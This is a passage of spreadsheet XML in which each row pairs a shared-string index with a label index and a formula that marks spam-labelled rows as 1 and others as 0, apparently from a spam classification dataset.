    <row r="4779" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4779" t="s">
        <v>9753</v>
      </c>
      <c r="B4779" t="s">
        <v>5294</v>
      </c>
      <c r="C4779" s="1">
        <f>IF(B4779="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4780" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4780" t="s">
        <v>9754</v>
      </c>
      <c r="B4780" t="s">
        <v>5294</v>
      </c>
      <c r="C4780" s="1">
        <f>IF(B4780="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4781" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4781" t="s">
        <v>9755</v>
      </c>
      <c r="B4781" t="s">
        <v>5294</v>
      </c>
      <c r="C4781" s="1">
        <f>IF(B4781="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4782" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4782" t="s">
        <v>9756</v>
      </c>
      <c r="B4782" t="s">
        <v>5294</v>
      </c>
      <c r="C4782" s="1">
        <f>IF(B4782="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4783" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4783" t="s">
        <v>9757</v>
      </c>
      <c r="B4783" t="s">
        <v>5294</v>
      </c>
      <c r="C4783" s="1">
        <f>IF(B4783="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4784" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4784" t="s">
        <v>9758</v>
      </c>
      <c r="B4784" t="s">
        <v>5294</v>
      </c>
      <c r="C4784" s="1">
        <f>IF(B4784="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4785" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4785" t="s">
        <v>9759</v>
      </c>
      <c r="B4785" t="s">
        <v>5294</v>
      </c>
      <c r="C4785" s="1">
        <f>IF(B4785="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4786" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4786" t="s">
        <v>9760</v>
      </c>
      <c r="B4786" t="s">
        <v>5297</v>
      </c>
      <c r="C4786" s="1">
        <f>IF(B4786="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4787" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4787" t="s">
        <v>9761</v>
      </c>
      <c r="B4787" t="s">
        <v>5294</v>
      </c>
      <c r="C4787" s="1">
        <f>IF(B4787="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4788" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4788" t="s">
        <v>9762</v>
      </c>
      <c r="B4788" t="s">
        <v>5294</v>
      </c>
      <c r="C4788" s="1">
        <f>IF(B4788="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4789" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4789" t="s">
        <v>9763</v>
      </c>
      <c r="B4789" t="s">
        <v>5294</v>
      </c>
      <c r="C4789" s="1">
        <f>IF(B4789="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4790" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4790" t="s">
        <v>9764</v>
      </c>
      <c r="B4790" t="s">
        <v>5294</v>
      </c>
      <c r="C4790" s="1">
        <f>IF(B4790="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4791" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4791" t="s">
        <v>9765</v>
      </c>
      <c r="B4791" t="s">
        <v>5294</v>
      </c>
      <c r="C4791" s="1">
        <f>IF(B4791="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4792" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4792" t="s">
        <v>9766</v>
      </c>
      <c r="B4792" t="s">
        <v>5294</v>
      </c>
      <c r="C4792" s="1">
        <f>IF(B4792="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4793" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4793" t="s">
        <v>9767</v>
      </c>
      <c r="B4793" t="s">
        <v>5294</v>
      </c>
      <c r="C4793" s="1">
        <f>IF(B4793="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4794" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4794" t="s">
        <v>9768</v>
      </c>
      <c r="B4794" t="s">
        <v>5294</v>
      </c>
      <c r="C4794" s="1">
        <f>IF(B4794="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4795" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4795" t="s">
        <v>9769</v>
      </c>
      <c r="B4795" t="s">
        <v>5294</v>
      </c>
      <c r="C4795" s="1">
        <f>IF(B4795="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4796" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4796" t="s">
        <v>9770</v>
      </c>
      <c r="B4796" t="s">
        <v>5294</v>
      </c>
      <c r="C4796" s="1">
        <f>IF(B4796="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4797" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4797" t="s">
        <v>9771</v>
      </c>
      <c r="B4797" t="s">
        <v>5297</v>
      </c>
      <c r="C4797" s="1">
        <f>IF(B4797="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4798" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4798" t="s">
        <v>9772</v>
      </c>
      <c r="B4798" t="s">
        <v>5297</v>
      </c>
      <c r="C4798" s="1">
        <f>IF(B4798="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4799" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4799" t="s">
        <v>9773</v>
      </c>
      <c r="B4799" t="s">
        <v>5294</v>
      </c>
      <c r="C4799" s="1">
        <f>IF(B4799="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4800" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4800" t="s">
        <v>9774</v>
      </c>
      <c r="B4800" t="s">
        <v>5294</v>
      </c>
      <c r="C4800" s="1">
        <f>IF(B4800="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4801" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4801" t="s">
        <v>9775</v>
      </c>
      <c r="B4801" t="s">
        <v>5294</v>
      </c>
      <c r="C4801" s="1">
        <f>IF(B4801="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4802" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4802" t="s">
        <v>9776</v>
      </c>
      <c r="B4802" t="s">
        <v>5294</v>
      </c>
      <c r="C4802" s="1">
        <f>IF(B4802="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4803" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4803" t="s">
        <v>8460</v>
      </c>
      <c r="B4803" t="s">
        <v>5294</v>
      </c>
      <c r="C4803" s="1">
        <f>IF(B4803="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4804" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4804" t="s">
        <v>9777</v>
      </c>
      <c r="B4804" t="s">
        <v>5294</v>
      </c>
      <c r="C4804" s="1">
        <f>IF(B4804="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4805" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4805" t="s">
        <v>9778</v>
      </c>
      <c r="B4805" t="s">
        <v>5294</v>
      </c>
      <c r="C4805" s="1">
        <f>IF(B4805="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4806" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4806" t="s">
        <v>9779</v>
      </c>
      <c r="B4806" t="s">
        <v>5294</v>
      </c>
      <c r="C4806" s="1">
        <f>IF(B4806="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4807" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4807" t="s">
        <v>9780</v>
      </c>
      <c r="B4807" t="s">
        <v>5294</v>
      </c>
      <c r="C4807" s="1">
        <f>IF(B4807="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4808" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4808" t="s">
        <v>9781</v>
      </c>
      <c r="B4808" t="s">
        <v>5297</v>
      </c>
      <c r="C4808" s="1">
        <f>IF(B4808="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4809" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4809" t="s">
        <v>9782</v>
      </c>
      <c r="B4809" t="s">
        <v>5294</v>
      </c>
      <c r="C4809" s="1">
        <f>IF(B4809="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4810" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4810" t="s">
        <v>9783</v>
      </c>
      <c r="B4810" t="s">
        <v>5294</v>
      </c>
      <c r="C4810" s="1">
        <f>IF(B4810="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4811" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4811" t="s">
        <v>9784</v>
      </c>
      <c r="B4811" t="s">
        <v>5294</v>
      </c>
      <c r="C4811" s="1">
        <f>IF(B4811="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4812" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4812" t="s">
        <v>9785</v>
      </c>
      <c r="B4812" t="s">
        <v>5294</v>
      </c>
      <c r="C4812" s="1">
        <f>IF(B4812="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4813" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4813" t="s">
        <v>9786</v>
      </c>
      <c r="B4813" t="s">
        <v>5294</v>
      </c>
      <c r="C4813" s="1">
        <f>IF(B4813="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4814" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4814" t="s">
        <v>9787</v>
      </c>
      <c r="B4814" t="s">
        <v>5294</v>
      </c>
      <c r="C4814" s="1">
        <f>IF(B4814="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4815" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4815" t="s">
        <v>5825</v>
      </c>
      <c r="B4815" t="s">
        <v>5294</v>
      </c>
      <c r="C4815" s="1">
        <f>IF(B4815="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4816" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4816" t="s">
        <v>9788</v>
      </c>
      <c r="B4816" t="s">
        <v>5294</v>
      </c>
      <c r="C4816" s="1">
        <f>IF(B4816="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4817" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4817" t="s">
        <v>9789</v>
      </c>
      <c r="B4817" t="s">
        <v>5294</v>
      </c>
      <c r="C4817" s="1">
        <f>IF(B4817="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4818" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4818" t="s">
        <v>9790</v>
      </c>
      <c r="B4818" t="s">
        <v>5294</v>
      </c>
      <c r="C4818" s="1">
        <f>IF(B4818="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4819" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4819" t="s">
        <v>9791</v>
      </c>
      <c r="B4819" t="s">
        <v>5294</v>
      </c>
      <c r="C4819" s="1">
        <f>IF(B4819="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4820" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4820" t="s">
        <v>9792</v>
      </c>
      <c r="B4820" t="s">
        <v>5294</v>
      </c>
      <c r="C4820" s="1">
        <f>IF(B4820="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4821" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4821" t="s">
        <v>9793</v>
      </c>
      <c r="B4821" t="s">
        <v>5297</v>
      </c>
      <c r="C4821" s="1">
        <f>IF(B4821="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4822" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4822" t="s">
        <v>9794</v>
      </c>
      <c r="B4822" t="s">
        <v>5294</v>
      </c>
      <c r="C4822" s="1">
        <f>IF(B4822="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4823" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4823" t="s">
        <v>9795</v>
      </c>
      <c r="B4823" t="s">
        <v>5297</v>
      </c>
      <c r="C4823" s="1">
        <f>IF(B4823="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4824" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4824" t="s">
        <v>9796</v>
      </c>
      <c r="B4824" t="s">
        <v>5294</v>
      </c>
      <c r="C4824" s="1">
        <f>IF(B4824="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4825" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4825" t="s">
        <v>9797</v>
      </c>
      <c r="B4825" t="s">
        <v>5294</v>
      </c>
      <c r="C4825" s="1">
        <f>IF(B4825="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4826" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4826" t="s">
        <v>9798</v>
      </c>
      <c r="B4826" t="s">
        <v>5294</v>
      </c>
      <c r="C4826" s="1">
        <f>IF(B4826="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4827" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4827" t="s">
        <v>9799</v>
      </c>
      <c r="B4827" t="s">
        <v>5294</v>
      </c>
      <c r="C4827" s="1">
        <f>IF(B4827="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4828" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4828" t="s">
        <v>9800</v>
      </c>
      <c r="B4828" t="s">
        <v>5294</v>
      </c>
      <c r="C4828" s="1">
        <f>IF(B4828="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4829" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4829" t="s">
        <v>9801</v>
      </c>
      <c r="B4829" t="s">
        <v>5294</v>
      </c>
      <c r="C4829" s="1">
        <f>IF(B4829="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4830" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4830" t="s">
        <v>9802</v>
      </c>
      <c r="B4830" t="s">
        <v>5294</v>
      </c>
      <c r="C4830" s="1">
        <f>IF(B4830="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4831" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4831" t="s">
        <v>9803</v>
      </c>
      <c r="B4831" t="s">
        <v>5294</v>
      </c>
      <c r="C4831" s="1">
        <f>IF(B4831="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4832" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4832" t="s">
        <v>9804</v>
      </c>
      <c r="B4832" t="s">
        <v>5294</v>
      </c>
      <c r="C4832" s="1">
        <f>IF(B4832="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4833" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4833" t="s">
        <v>9805</v>
      </c>
      <c r="B4833" t="s">
        <v>5294</v>
      </c>
      <c r="C4833" s="1">
        <f>IF(B4833="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4834" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4834" t="s">
        <v>9806</v>
      </c>
      <c r="B4834" t="s">
        <v>5297</v>
      </c>
      <c r="C4834" s="1">
        <f>IF(B4834="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4835" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4835" t="s">
        <v>9807</v>
      </c>
      <c r="B4835" t="s">
        <v>5294</v>
      </c>
      <c r="C4835" s="1">
        <f>IF(B4835="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4836" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4836" t="s">
        <v>9808</v>
      </c>
      <c r="B4836" t="s">
        <v>5294</v>
      </c>
      <c r="C4836" s="1">
        <f>IF(B4836="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4837" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4837" t="s">
        <v>9809</v>
      </c>
      <c r="B4837" t="s">
        <v>5294</v>
      </c>
      <c r="C4837" s="1">
        <f>IF(B4837="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4838" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4838" t="s">
        <v>9810</v>
      </c>
      <c r="B4838" t="s">
        <v>5294</v>
      </c>
      <c r="C4838" s="1">
        <f>IF(B4838="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4839" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4839" t="s">
        <v>9811</v>
      </c>
      <c r="B4839" t="s">
        <v>5294</v>
      </c>
      <c r="C4839" s="1">
        <f>IF(B4839="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4840" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4840" t="s">
        <v>9812</v>
      </c>
      <c r="B4840" t="s">
        <v>5294</v>
      </c>
      <c r="C4840" s="1">
        <f>IF(B4840="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4841" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4841" t="s">
        <v>9813</v>
      </c>
      <c r="B4841" t="s">
        <v>5297</v>
      </c>
      <c r="C4841" s="1">
        <f>IF(B4841="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4842" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4842" t="s">
        <v>9814</v>
      </c>
      <c r="B4842" t="s">
        <v>5294</v>
      </c>
      <c r="C4842" s="1">
        <f>IF(B4842="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4843" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4843" t="s">
        <v>9815</v>
      </c>
      <c r="B4843" t="s">
        <v>5294</v>
      </c>
      <c r="C4843" s="1">
        <f>IF(B4843="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4844" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4844" t="s">
        <v>9816</v>
      </c>
      <c r="B4844" t="s">
        <v>5294</v>
      </c>
      <c r="C4844" s="1">
        <f>IF(B4844="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4845" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4845" t="s">
        <v>9817</v>
      </c>
      <c r="B4845" t="s">
        <v>5297</v>
      </c>
      <c r="C4845" s="1">
        <f>IF(B4845="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4846" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4846" t="s">
        <v>9818</v>
      </c>
      <c r="B4846" t="s">
        <v>5294</v>
      </c>
      <c r="C4846" s="1">
        <f>IF(B4846="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4847" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4847" t="s">
        <v>9819</v>
      </c>
      <c r="B4847" t="s">
        <v>5294</v>
      </c>
      <c r="C4847" s="1">
        <f>IF(B4847="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4848" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4848" t="s">
        <v>8683</v>
      </c>
      <c r="B4848" t="s">
        <v>5294</v>
      </c>
      <c r="C4848" s="1">
        <f>IF(B4848="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4849" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4849" t="s">
        <v>9820</v>
      </c>
      <c r="B4849" t="s">
        <v>5294</v>
      </c>
      <c r="C4849" s="1">
        <f>IF(B4849="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4850" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4850" t="s">
        <v>9821</v>
      </c>
      <c r="B4850" t="s">
        <v>5294</v>
      </c>
      <c r="C4850" s="1">
        <f>IF(B4850="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4851" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4851" t="s">
        <v>9822</v>
      </c>
      <c r="B4851" t="s">
        <v>5294</v>
      </c>
      <c r="C4851" s="1">
        <f>IF(B4851="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4852" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4852" t="s">
        <v>9823</v>
      </c>
      <c r="B4852" t="s">
        <v>5294</v>
      </c>
      <c r="C4852" s="1">
        <f>IF(B4852="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4853" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4853" t="s">
        <v>9824</v>
      </c>
      <c r="B4853" t="s">
        <v>5294</v>
      </c>
      <c r="C4853" s="1">
        <f>IF(B4853="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4854" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4854" t="s">
        <v>9825</v>
      </c>
      <c r="B4854" t="s">
        <v>5294</v>
      </c>
      <c r="C4854" s="1">
        <f>IF(B4854="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4855" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4855" t="s">
        <v>9826</v>
      </c>
      <c r="B4855" t="s">
        <v>5294</v>
      </c>
      <c r="C4855" s="1">
        <f>IF(B4855="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4856" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4856" t="s">
        <v>9827</v>
      </c>
      <c r="B4856" t="s">
        <v>5294</v>
      </c>
      <c r="C4856" s="1">
        <f>IF(B4856="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4857" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4857" t="s">
        <v>9828</v>
      </c>
      <c r="B4857" t="s">
        <v>5294</v>
      </c>
      <c r="C4857" s="1">
        <f>IF(B4857="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4858" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4858" t="s">
        <v>9829</v>
      </c>
      <c r="B4858" t="s">
        <v>5294</v>
      </c>
      <c r="C4858" s="1">
        <f>IF(B4858="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4859" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4859" t="s">
        <v>6531</v>
      </c>
      <c r="B4859" t="s">
        <v>5294</v>
      </c>
      <c r="C4859" s="1">
        <f>IF(B4859="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4860" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4860" t="s">
        <v>9830</v>
      </c>
      <c r="B4860" t="s">
        <v>5294</v>
      </c>
      <c r="C4860" s="1">
        <f>IF(B4860="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4861" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4861" t="s">
        <v>9831</v>
      </c>
      <c r="B4861" t="s">
        <v>5294</v>
      </c>
      <c r="C4861" s="1">
        <f>IF(B4861="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4862" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4862" t="s">
        <v>9832</v>
      </c>
      <c r="B4862" t="s">
        <v>5294</v>
      </c>
      <c r="C4862" s="1">
        <f>IF(B4862="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4863" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4863" t="s">
        <v>9833</v>
      </c>
      <c r="B4863" t="s">
        <v>5297</v>
      </c>
      <c r="C4863" s="1">
        <f>IF(B4863="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4864" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4864" t="s">
        <v>9052</v>
      </c>
      <c r="B4864" t="s">
        <v>5297</v>
      </c>
      <c r="C4864" s="1">
        <f>IF(B4864="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4865" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4865" t="s">
        <v>9834</v>
      </c>
      <c r="B4865" t="s">
        <v>5294</v>
      </c>
      <c r="C4865" s="1">
        <f>IF(B4865="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4866" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4866" t="s">
        <v>9835</v>
      </c>
      <c r="B4866" t="s">
        <v>5294</v>
      </c>
      <c r="C4866" s="1">
        <f>IF(B4866="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4867" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4867" t="s">
        <v>9836</v>
      </c>
      <c r="B4867" t="s">
        <v>5294</v>
      </c>
      <c r="C4867" s="1">
        <f>IF(B4867="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4868" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4868" t="s">
        <v>9837</v>
      </c>
      <c r="B4868" t="s">
        <v>5294</v>
      </c>
      <c r="C4868" s="1">
        <f>IF(B4868="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4869" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4869" t="s">
        <v>5932</v>
      </c>
      <c r="B4869" t="s">
        <v>5294</v>
      </c>
      <c r="C4869" s="1">
        <f>IF(B4869="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4870" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4870" t="s">
        <v>9838</v>
      </c>
      <c r="B4870" t="s">
        <v>5294</v>
      </c>
      <c r="C4870" s="1">
        <f>IF(B4870="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4871" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4871" t="s">
        <v>9839</v>
      </c>
      <c r="B4871" t="s">
        <v>5294</v>
      </c>
      <c r="C4871" s="1">
        <f>IF(B4871="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4872" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4872" t="s">
        <v>9840</v>
      </c>
      <c r="B4872" t="s">
        <v>5294</v>
      </c>
      <c r="C4872" s="1">
        <f>IF(B4872="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4873" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4873" t="s">
        <v>9841</v>
      </c>
      <c r="B4873" t="s">
        <v>5294</v>
      </c>
      <c r="C4873" s="1">
        <f>IF(B4873="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4874" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4874" t="s">
        <v>9842</v>
      </c>
      <c r="B4874" t="s">
        <v>5294</v>
      </c>
      <c r="C4874" s="1">
        <f>IF(B4874="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4875" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4875" t="s">
        <v>9843</v>
      </c>
      <c r="B4875" t="s">
        <v>5294</v>
      </c>
      <c r="C4875" s="1">
        <f>IF(B4875="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4876" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4876" t="s">
        <v>9844</v>
      </c>
      <c r="B4876" t="s">
        <v>5294</v>
      </c>
      <c r="C4876" s="1">
        <f>IF(B4876="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4877" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4877" t="s">
        <v>9845</v>
      </c>
      <c r="B4877" t="s">
        <v>5297</v>
      </c>
      <c r="C4877" s="1">
        <f>IF(B4877="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4878" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4878" t="s">
        <v>9846</v>
      </c>
      <c r="B4878" t="s">
        <v>5294</v>
      </c>
      <c r="C4878" s="1">
        <f>IF(B4878="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4879" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4879" t="s">
        <v>8137</v>
      </c>
      <c r="B4879" t="s">
        <v>5297</v>
      </c>
      <c r="C4879" s="1">
        <f>IF(B4879="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4880" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4880" t="s">
        <v>9847</v>
      </c>
      <c r="B4880" t="s">
        <v>5294</v>
      </c>
      <c r="C4880" s="1">
        <f>IF(B4880="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4881" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4881" t="s">
        <v>9848</v>
      </c>
      <c r="B4881" t="s">
        <v>5294</v>
      </c>
      <c r="C4881" s="1">
        <f>IF(B4881="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4882" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4882" t="s">
        <v>9849</v>
      </c>
      <c r="B4882" t="s">
        <v>5294</v>
      </c>
      <c r="C4882" s="1">
        <f>IF(B4882="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
